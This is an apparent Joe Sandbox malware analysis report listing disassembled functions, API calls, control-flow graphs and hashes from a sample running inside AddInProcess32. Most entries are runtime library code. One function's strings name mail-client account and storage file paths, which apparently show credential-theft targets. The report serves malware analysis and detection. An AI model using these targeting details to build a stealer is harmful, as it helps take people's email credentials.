                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D72
                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D7D
                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                  • String ID:
                                                                                                  • API String ID: 1454806937-0
                                                                                                  • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                  • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                                                                  • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                  • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                                                                  Function 10009492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 377 10009492-100094ef GetConsoleCP 378 10009632-10009644 call 10002ada 377->378 379 100094f5-10009511 377->379 380 10009513-1000952a 379->380 381 1000952c-1000953d call 10007c19 379->381 384 10009566-10009575 call 100079e6 380->384 389 10009563-10009565 381->389 390 1000953f-10009542 381->390 384->378 391 1000957b-1000959b WideCharToMultiByte 384->391 389->384 392 10009548-1000955a call 100079e6 390->392 393 10009609-10009628 390->393 391->378 394 100095a1-100095b7 WriteFile 391->394 392->378 400 10009560-10009561 392->400 393->378 396 100095b9-100095ca 394->396 397 1000962a-10009630 GetLastError 394->397 396->378 399 100095cc-100095d0 396->399 397->378 401 100095d2-100095f0 WriteFile 399->401 402 100095fe-10009601 399->402 400->391 401->397 403 100095f2-100095f6 401->403 402->379 404 10009607 402->404 403->378 405 100095f8-100095fb 403->405 404->378 405->402
                                                                                                  APIs
                                                                                                  • GetConsoleCP.KERNEL32 ref: 100094D4
                                                                                                  • __fassign.LIBCMT ref: 1000954F
                                                                                                  • __fassign.LIBCMT ref: 1000956A
                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 100095AF
                                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 100095E8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 1324828854-0
                                                                                                  • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                  • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                                                                  • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                  • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                                                                  Function 10003370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 406 10003370-100033b5 call 10003330 call 100037a7 411 10003416-10003419 406->411 412 100033b7-100033c9 406->412 413 10003439-10003442 411->413 414 1000341b-10003428 call 10003790 411->414 412->413 415 100033cb 412->415 418 1000342d-10003436 call 10003330 414->418 417 100033d0-100033e7 415->417 419 100033e9-100033f7 call 10003740 417->419 420 100033fd 417->420 418->413 428 100033f9 419->428 429 1000340d-10003414 419->429 421 10003400-10003405 420->421 421->417 424 10003407-10003409 421->424 424->413 427 1000340b 424->427 427->418 430 10003443-1000344c 428->430 431 100033fb 428->431 429->418 432 10003486-10003496 call 10003774 430->432 433 1000344e-10003455 430->433 431->421 439 10003498-100034a7 call 10003790 432->439 440 100034aa-100034c6 call 10003330 call 10003758 432->440 433->432 435 10003457-10003466 call 1000bbe0 433->435 441 10003483 435->441 442 10003468-10003480 435->442 439->440 441->432 442->441
                                                                                                  APIs
                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                  • String ID: csm
                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                  • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                  • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                                                                  • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                  • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                                                                  Function 1000925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                    • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                                                  • _free.LIBCMT ref: 100092AB
                                                                                                    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                  • _free.LIBCMT ref: 100092B6
                                                                                                  • _free.LIBCMT ref: 100092C1
                                                                                                  • _free.LIBCMT ref: 10009315
                                                                                                  • _free.LIBCMT ref: 10009320
                                                                                                  • _free.LIBCMT ref: 1000932B
                                                                                                  • _free.LIBCMT ref: 10009336
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 776569668-0
                                                                                                  • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                  • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                                                                  • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                  • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                                                                  Function 10008821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 488 10008821-1000883a 489 10008850-10008855 488->489 490 1000883c-1000884c call 10009341 488->490 492 10008862-10008886 MultiByteToWideChar 489->492 493 10008857-1000885f 489->493 490->489 497 1000884e 490->497 495 10008a19-10008a2c call 10002ada 492->495 496 1000888c-10008898 492->496 493->492 498 1000889a-100088ab 496->498 499 100088ec 496->499 497->489 502 100088ca-100088db call 100056d0 498->502 503 100088ad-100088bc call 1000bf20 498->503 501 100088ee-100088f0 499->501 505 100088f6-10008909 MultiByteToWideChar 501->505 506 10008a0e 501->506 502->506 516 100088e1 502->516 503->506 515 100088c2-100088c8 503->515 505->506 509 1000890f-1000892a call 10005f19 505->509 510 10008a10-10008a17 call 10008801 506->510 509->506 520 10008930-10008937 509->520 510->495 517 100088e7-100088ea 515->517 516->517 517->501 521 10008971-1000897d 520->521 522 10008939-1000893e 520->522 524 100089c9 521->524 525 1000897f-10008990 521->525 522->510 523 10008944-10008946 522->523 523->506 528 1000894c-10008966 call 10005f19 523->528 529 100089cb-100089cd 524->529 526 10008992-100089a1 call 1000bf20 525->526 527 100089ab-100089bc call 100056d0 525->527 533 10008a07-10008a0d call 10008801 526->533 540 100089a3-100089a9 526->540 527->533 542 100089be 527->542 528->510 543 1000896c 528->543 529->533 534 100089cf-100089e8 call 10005f19 529->534 533->506 534->533 546 100089ea-100089f1 534->546 545 100089c4-100089c7 540->545 542->545 543->506 545->529 547 100089f3-100089f4 546->547 548 10008a2d-10008a33 546->548 549 100089f5-10008a05 WideCharToMultiByte 547->549 548->549 549->533 550 10008a35-10008a3c call 10008801 549->550 550->510
                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                                                                  • __freea.LIBCMT ref: 10008A08
                                                                                                    • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                  • __freea.LIBCMT ref: 10008A11
                                                                                                  • __freea.LIBCMT ref: 10008A36
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1414292761-0
                                                                                                  • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                  • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                                                                  • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                  • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                                                                  Function 100015DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _strlen.LIBCMT ref: 10001607
                                                                                                  • _strcat.LIBCMT ref: 1000161D
                                                                                                  • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 1000165A
                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                                                                  • lstrcatW.KERNEL32(00001008,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 10001686
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 1922816806-0
                                                                                                  • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                  • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                                                                  • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                  • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                                                                  Function 10001000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 10001038
                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                                                                  • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: lstrlen$AttributesFilelstrcat
                                                                                                  • String ID:
                                                                                                  • API String ID: 3594823470-0
                                                                                                  • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                  • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                                                                  • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                  • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                                                                  Function 10003856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                                                                  • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                  • String ID:
                                                                                                  • API String ID: 3852720340-0
                                                                                                  • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                  • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                                                                  • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                  • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                                                                  Function 10005AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                  • _free.LIBCMT ref: 10005B2D
                                                                                                  • _free.LIBCMT ref: 10005B55
                                                                                                  • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                                                                  • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                  • _abort.LIBCMT ref: 10005B74
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                  • String ID:
                                                                                                  • API String ID: 3160817290-0
                                                                                                  • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                  • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                                                                  • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                  • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                                                                  Function 100011EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                    • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                                                                    • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                    • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                    • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                                                                  • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                                                    • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                                                    • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                  • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                  • API String ID: 4036392271-1520055953
                                                                                                  • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                  • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                                                                  • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                  • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                                                                  Function 10004B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10004B6C
                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                  • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                  • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                                                                  • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                  • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                                                                  Function 10007153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                                                    • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                                                                  • _free.LIBCMT ref: 100071B8
                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 336800556-0
                                                                                                  • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                  • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                                                                  • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                  • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                                                                  Function 10005B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                                                  • _free.LIBCMT ref: 10005BB4
                                                                                                  • _free.LIBCMT ref: 10005BDB
                                                                                                  • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                                                  • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 3170660625-0
                                                                                                  • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                  • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                                                                  • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                  • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                                                                  Function 10001E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                  • lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                                                                  • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                  • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                  • lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
